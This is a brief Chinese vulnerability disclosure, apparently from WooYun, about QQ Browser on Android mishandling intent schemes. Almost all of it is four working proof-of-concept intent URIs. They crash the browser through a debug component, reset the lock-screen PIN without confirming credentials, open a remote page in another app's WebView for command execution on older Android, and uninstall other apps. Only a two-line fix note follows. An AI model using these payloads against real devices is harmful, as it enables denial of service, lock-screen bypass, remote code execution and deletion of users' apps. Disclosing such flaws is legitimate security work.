qq浏览器IntentScheme处理不当
1.android all,浏览器拒绝服务
intent:#Intent;component=com.tencent.mtt/com.tencent.mtt.debug.DbgMemWatch;end
2.android 3.x-4.3,重置PIN码
intent:#Intent;action=android.settings.SETTINGS;S.:android:show_fragment=com.android.settings.ChooseLockPassword$ChooseLockPasswordFragment;B.confirm_credentials=false;launchFlags=0x00008000;end
3.android 4.2.2以下 结合其他app webview执行远程命令
intent:http://drops.wooyun.org/webview.html#Intent;component=com.android.browser/com.android.browser.BrowserActivity;end
poc为打开android 4.1的原生游览器
4.android all 卸载其他app
intent:package:org.wooyun.hiwooyun#Intent;action=android.intent.action.DELETE;end
浏览器版本
过滤intent